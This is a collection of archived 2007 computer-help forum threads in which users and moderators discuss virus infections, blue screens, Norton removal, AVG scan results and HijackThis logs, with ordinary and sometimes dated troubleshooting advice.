Have you tried deleting the account yet?

Why don't we do one machine at a time. Pick one and give us a lot of information about it.

OS Name    Microsoft(R) Windows(R) Server 2003, Enterprise Edition
Version    5.2.3790 Service Pack 1 Build 3790
System Manufacturer    INTEL_
System Model    D845GVS1

Ashampoo Antivirus installed. But the problem was started after creating User, and the error message is coming only on user logon.


sneha

3290.

Solve : A virus??

Answer»

I'm running Windows XP and Internet Explorer browser. for some reason (unknown), i have been getting the BSoD aloBSOD came up again, as i was saying, the BSoD (blue screen of death) has been coming up with along the lines of STOP: 00x00000007b. i have norton 2007 and have been running regularly.

reply with any ideas as to why this happening.

thx

Inaccessible boot device or a virus...those are the 2 choices from the Mothership.

What protection do you have ? ?

Quote

i have norton 2007 and have been running system checks regularly.
Do you have a defrag utility running in background or scheduled to run while you are using the computer?

Quote from: ms_dos_sux on June 02, 2007, 09:51:53 AM
Quote
i have norton 2007 and have been running system checks regularly.
I'd say it's a stretch to call that protection. Have you tried scanning with any other programs?

Quote from: CBMatt on June 02, 2007, 01:30:16 PM
Quote from: ms_dos_sux on June 02, 2007, 09:51:53 AM
Quote
i have norton 2007 and have been running system checks regularly.
I'd say it's a stretch to call that protection. Have you tried scanning with any other programs?

They must just Love us over at Symantec....

Heh, I have no doubt that someone from the company is over here spying on us.

Quote from: CBMatt on June 02, 2007, 01:51:52 PM
Heh, I have no doubt that someone from the company is over here spying on us.

I think it's Zylstra....


Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
3291.

Solve : Is RavMonE.exe a virus??

Answer»

Quote from: Ledio on May 18, 2007, 01:44:48 PM

very useful, but it has not attracting GUI

Many useful tools do not...

FDisk
MBRWiz
Ghost
ProComm

Ugliest i've seen but they work.

As this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
3292.

Solve : Problem with keyboard?

Answer» Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
3293.

Solve : Virus/Spyware Problem..?

Answer»

I scanned for everything and deleted everything that it said was wrong, but my computer runs really slow and it sends out tons of emails and I have no clue to who.

Click here

In summary...we need more information.

What's your OS?
What protection do you have?
How many running processes? Any with high mem usage?
How long has this been happening?
HijackThis log?
What infections were deleted?

Basically, you need to tell us as much as you possibly can. Otherwise, we don't know anymore than you do.

Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

3294.

Solve : Can't delete this virus file!?

Answer»

And now Ledio has begun to hijack threads. Ledio is a newbie who can't organize his files nor realize the importance of a secure browser/PC judging from just one screenshot..

Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

3295.

Solve : Tough virus infection?

Answer»

As this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

3296.

Solve : Help trojan virus w32myzor.fk@yf?

Answer»

Got a backdoor trojan, [emailprotected](i think). That got past a free edition of AVG i had installed on my pc. After knowing i had the trojan and AVG couldn't prevent it, I installed PC - Cillin which has not resolved the problem. The trojan keeps opening internet explorer with various different sites for spyware/malware removal, asking you to buy them. Also the trojan slows down my pc drastically almost to a freeze. It has contaminated windows media player. I have tried microsoft windows defender, adaware by lavasoft and spybot search + destroy which the trojan prevents from even opening. Can anyone help?

get norton 2007 w/ liveupdate. it should automatically put all known viruses and trojans into quarantine, and should remove it from all other infected programs.

Travel <here> and follow the steps outlined in that guide.
Then post a HijackThis log for us to take a look at, so we can advise you on any remaining problems.
Quote from: ms_dos_sux on June 01, 2007, 07:10:06 AM

get norton 2007 w/ liveupdate. it should automatically put all known viruses and trojans into quarantine, and should remove it from all other infected programs.
There is a reason Norton is known as the Norton virus, and there is an entire FAQ article dedicated to its removal.
This advice is not the best, to say the least.
Please ignore it.

Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
3297.

Solve : Unloading Norton with Symantics Un-Installer?

Answer»

It has taken me weeks to get to this point either from travel or sheer fear of following through with the Norton uninstall process. I have done it ...as of this afternoon I am free of Norton and I am a new man. The uninstall worked famously, it didn't touch Partition Magic (my biggest fear) and my computer is once again the flaming bolt it was before. I am using AVG now, no Ghost...Erunt is my backup method (although I have never had to restore a system..Lucky), and I thank you all for your help. Especially Patio who I insulted by doubting his advice ("it is only advice") and may again. This forum is terrific for an old computer dude and you guys are super. Thanks and in the word of Arnold, "I will be back".

Sorry for the running post but I needed to tell everyone that a big video software conflict I have been having trouble with was solved by the Norton Uninstall. Now I can edit mpeg 2 files without getting a Window Explorer error message. All those who may be having media problems may find a norton un-install the answer. I have been on the phone with Dell, Sonic, Sony and Roxio for more than a week only to discover Norton is the culprit. Norton Uninstall does un-install Ghost but it can be reinstalled, but does NOT touch Partition which most of you guys knew already. Sorry, sometimes we rookies have to learn the hard way, experience is the best teacher.

As this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.



EDIT: I'm glad to hear it all worked out, by the way, dhinds.

3298.

Solve : PPCTL component?

Answer»

PPCTL component not correctly installed comes up every 10 sec. on Windows 2000. Can anyone help me? Thanks.

Much more information is needed to get an intelligent response. Keep it here, no need for another thread.

Ruthie B says it is really XP, so we know that much.

PPCTL is a component of Pest Patrol software.
Re-install it to get rid of the error message.
If you don't want to keep Pest Patrol remove it in Add/Remove Programs.

Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

3299.

Solve : I need to get my infected folders back to original state. Virus name: isass.exe?

Answer»

MeRK .... Is the work machine on a network ? If it is, can you isolate it from the network if necessary?

Please d/l ..... Stinger v3.4.9 from ..... http://vil.nai.com/vil/stinger/
I would suggest downloading it from a machine that is free of viruses and save it onto either a floppy disk or a cd.

Then from your work machine, d/l Spybot ........ http://www.spybot.info/en/
Once it is installed, get the latest updates........ Don't run it yet.

Now using the floppy disk or the cd (the one you d/l on a non infected machine) run it on your work machine and delete anything it finds (record what it found)

Next, run Spybot on your work machine and fix anything it finds (again record what was found)


Now then on to the hijack logfile..........

O2 - BHO: NoPhishing - {D3B071BE-7C15-43f6-8348-01EFC6092591} - C:\Progra~1\SoftRun\NoPhishing\NoPhishing.dll ...... Do you know if this is something that has been installed for sometime or is it something new ?

---------------------------------------------------------------------------------------------

016 entries....... Do you recognize these entries and know them to be ok ?
---------------------------------------------------------------------------------------------

O23 - Service: npkcsvc - INCA Internet Co., Ltd. - C:\WINDOWS\system32\npkcsvc.exe

This one looks nasty ...... and should be marked for removal using HijackThis.
npkcsvc.exe - npkcsvc - Process Information
Process File: npkcsvc.exe or npkcsvc
Process Name: Trojan-Downloader.Win32.Agent

Description:
npkcsvc.exe is a process which is registered as the Trojan-Downloader.Win32.Agent Trojan. This Trojan allows attackers to access your computer from remote locations, stealing passwords, Internet banking and personal data. This process is a security risk and should be removed from your system.

Sorry to be a little unsure re the removals, but most of the info I get is in Korean and when I translate it into English some of the meaning is lost in translation.

Let us know the results of above.

DL65




will do thanks.

And remove your internet cable

dl65,

Whatever you do keep kool, please, . . .

I have a, (isass.exe), listed under processes in Task Manager.

Excepting it is spelled lsass.exe, does this mean I am infected ?

Jp

Jp .... lsass is the correct legit file. The other is not. Looks like you should be OK.

If you are having problems start your own new topic in this forum. Please do not piggy back on this thread.

***************

MeRK ... DAFT usually fixes file associations. No promises but try it and report back.

Get it here ....

http://www.techsupportforum.com/sectools/Deckard/daft.exe

Download DAFT and save it to your desktop:

1. Double-click the daft.exe icon. Read the disclaimer and click OK.
2. Click on the Scan button.
3. Save a logfile. By default, it will save as daft.txt.

Post the resulting log here. If everything is in order again it should display the "all associations OK message".

Let us know what happens.

By the way if this is a work computer why isn't your IT manager fixing your problems? He's paid to do it. We're not.


OJ

OJ,

Thanks,

No this is not a work computer, . .But, . . .

Has CH tried accepting donations ? You'd probably be surprised at how thankful some people can be, . . I'm strapped for the time being, however,
I'd still shell-out what I could, to know your ambitions and dreams wouldn't fade away in misery.

Yep, I'll take a look at what you said and get back to you, . . .

JP
MeRK ........ I assumed you had tried this......
You can restore individual associations pretty easily from the Open With dialog box. To get there in Windows XP, right-click a file of the associated type and select Properties, click the Change button across from 'Opens with', and then, if necessary, choose Select the program from a list.

If you haven't tried this give it a try.
If that fails to help you, give the link "oddjob" supplied a go, his advice is usually sound. Please follow his instructions to the letter.

dl65
MeRK .... following on your PM to me, yes, you may have a file association problem that DAFT will fix. If not there's no problem running DAFT. If your file associations are all OK then DAFT won't cause problems.

All my own file associations are fine and I have run DAFT a couple of times without problems.

I still suggest you run DAFT on your machine and let us know what happens.

I am in touch with the program's developer and he is always interested in feedback, good or bad, as this is a fairly new program. Feedback helps him improve the program.


OJ

PS... thanks for the vote of confidence, dl65

To answer the first question of why my IT guy is not handling this.... there isn't one. I work for a lame *censored* computer illiterate %$#@%#$ boss who is a penny [emailprotected]#$##@[emailprotected]## who has no idea how anything works..he doesn't even have firewalls up, but that's besides the point. I currently work in South Korea and it seems like most smaller companies here just think viruses are a normal thing and not worry about it too much. Secondly.. I would love to try the daft thing or anything else that was posted from you guys (Much much much thanks by the way) but my co worker.. has just reformatted everything, without telling me.... I Love where I work.. I swear if I wasn't making decent money..I would go back to the states right now. So much thanks guys. Now that I know this forum exists, I will be back more often to learn more and maybe help where I can. Again much thanks.

Quote from: MeRK on May 21, 2007, 04:43:29 PM

I will be back more often
I hope this doesn't mean you're expecting more trouble...!!

Best wishes.


OJ

As this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
3300.

Solve : strange file found by AVG 7.5, free edition,?

Answer»

Folks,

I have noticed that each time a complete test is done a file shows up in the scanning window, 'ntoskrnl.exe', under the Result/infection column, it says 'change' under Path column 'c:\WINDOWS\system32\ntoskrnl.ex
But the complete test result finally shows 'no threat found'.
I am using windows XP professional version. on an IBM netvista computer,

I posted the same query on the AVG forum http://forum.grisoft.cz/freeforum/search.php?8

but never received any reply hope someone will help out here.

regards
The_Saint
This was asked not too long ago, but for the life of me, I can't find the thread for some reason. I must be tired. In any case, it's nothing to worry about. This is normal. This is just related to general maintenance, Windows Updates, or perhaps correcting a driver issue. You should only be concerned if AVG says the file is infected.

Agreed. I get the same with AVG 7.5.

As soon as a scan starts, it lists

user32.dll (C:\Windows\System32\user32.dll)
shell32.dll (C:\Windows\System32\shell32.dll)
ntoskrnl.exe (C:\Windows\System32\ntoskrnl.exe)

It just means that updates have taken place.
like say you just updated your host files it would put host files there too

As this issue appears to be resolved, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.